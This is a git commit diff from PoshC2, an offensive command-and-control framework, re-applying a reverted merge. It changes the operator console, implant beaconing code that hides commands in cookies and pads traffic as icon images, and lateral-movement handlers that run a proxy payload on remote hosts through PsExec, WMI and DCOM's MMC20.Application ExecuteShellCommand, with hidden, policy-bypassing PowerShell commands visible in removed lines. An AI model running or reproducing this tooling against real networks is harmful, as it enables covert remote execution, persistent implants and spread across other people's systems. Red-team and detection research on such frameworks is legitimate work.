Revert "Revert "Merge branch 'master' of https://github.com/nettitude/PoshC2_Python""

This reverts commit 9f8b17f6a6.
chunking
rolen 2019-01-21 09:49:07 +00:00
parent 9f8b17f6a6
commit 1ef348e32c
6 changed files with 2840 additions and 1515 deletions

View File

@ -3,6 +3,7 @@
from Colours import * from Colours import *
from Config import * from Config import *
from DB import * from DB import *
from Help import *
import time, os import time, os
rows = 10 rows = 10
@ -16,8 +17,10 @@ try:
except Exception as e: except Exception as e:
print "cls" print "cls"
print chr(27) + "[2J" print chr(27) + "[2J"
print Colours.GREEN,""
print logo, Colours.END print (Colours.GREEN + "")
print (logopic)
print (Colours.END + "")
try: try:
taskid = get_seqcount("CompletedTasks") + 1 taskid = get_seqcount("CompletedTasks") + 1
@ -37,6 +40,7 @@ except Exception as e:
user = "None" user = "None"
implantid = 1 implantid = 1
print newtaskid
while(1): while(1):
try: try:
newtask = get_newtasksbyid(newtaskid) newtask = get_newtasksbyid(newtaskid)

View File

@ -67,6 +67,8 @@ public class Program
proxy.UseDefaultCredentials = false; proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false; proxy.BypassProxyOnLocal = false;
x.Proxy = proxy; x.Proxy = proxy;
} else {
x.UseDefaultCredentials = true;
} }
var df = "#REPLACEDF#"; var df = "#REPLACEDF#";

View File

@ -242,6 +242,8 @@ while(True):
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
opener = urllib2.build_opener() opener = urllib2.build_opener()
if (len(cmd) > 200):
cmd = cmd[0:200]
postcookie = encrypt(key, cmd) postcookie = encrypt(key, cmd)
data = base64.b64decode(random.choice(icoimage)) data = base64.b64decode(random.choice(icoimage))
dataimage = data.ljust( 1500, '\\0' ) dataimage = data.ljust( 1500, '\\0' )

View File

@ -317,7 +317,7 @@ def startup(printhelp = ""):
for t in comtasks: for t in comtasks:
hostname = get_implantdetails(t[2]) hostname = get_implantdetails(t[2])
if hostname[2] not in users: if hostname[2] not in users:
users += "%s \n" % hostname[2] users += "%s @ %s\n" % (hostname[2],hostname[3])
if "Upload-File" in t[3]: if "Upload-File" in t[3]:
uploadedfile = t[3] uploadedfile = t[3]
uploadedfile = uploadedfile.partition("estination ")[2] uploadedfile = uploadedfile.partition("estination ")[2]
@ -350,7 +350,7 @@ def startup(printhelp = ""):
else: else:
for task in tasks: for task in tasks:
imname = get_implantdetails(task[1]) imname = get_implantdetails(task[1])
alltasks += "(%s) %s\r\n" % ("%s" % (imname[11]),task[2]) alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
startup("Queued tasks:\r\n\r\n%s" % alltasks) startup("Queued tasks:\r\n\r\n%s" % alltasks)
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "): if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
@ -824,18 +824,14 @@ def runcommand(command, randomuri):
elif "invoke-psexecproxypayload" in command.lower(): elif "invoke-psexecproxypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri) check_module_loaded("Invoke-PsExec.ps1", randomuri)
C2 = get_c2server_all() if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
if C2[11] == "": with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE) params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
params = params.sub("", command) params = params.sub("", command)
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, randomuri) new_task(cmd, randomuri)
else:
startup("Need to run createproxypayload first")
elif "invoke-psexecdaisypayload" in command.lower(): elif "invoke-psexecdaisypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri) check_module_loaded("Invoke-PsExec.ps1", randomuri)
@ -865,18 +861,14 @@ def runcommand(command, randomuri):
elif "invoke-wmiproxypayload" in command.lower(): elif "invoke-wmiproxypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri) check_module_loaded("Invoke-WMIExec.ps1", randomuri)
C2 = get_c2server_all() if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
if C2[11] == "": with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command) params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, randomuri) new_task(cmd, randomuri)
else:
startup("Need to run createproxypayload first")
elif "invoke-wmidaisypayload" in command.lower(): elif "invoke-wmidaisypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri) check_module_loaded("Invoke-WMIExec.ps1", randomuri)
@ -905,15 +897,16 @@ def runcommand(command, randomuri):
# dcom lateral movement # dcom lateral movement
elif "invoke-dcomproxypayload" in command.lower(): elif "invoke-dcomproxypayload" in command.lower():
C2 = get_c2server_all() if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
C2[13], C2[11], "", "", C2[19], C2[20], params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) params = params.sub("", command)
payload = newPayload.CreateRawBase() p = re.compile(ur'(?<=-target.).*')
p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group()
target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, randomuri)
new_task(pscommand, randomuri) else:
startup("Need to run createproxypayload first")
elif "invoke-dcomdaisypayload" in command.lower(): elif "invoke-dcomdaisypayload" in command.lower():
daisyname = raw_input("Name required: ") daisyname = raw_input("Name required: ")

File diff suppressed because it is too large Load Diff

0
Modules/Invoke-DaisyChain.ps1 Executable file → Normal file
View File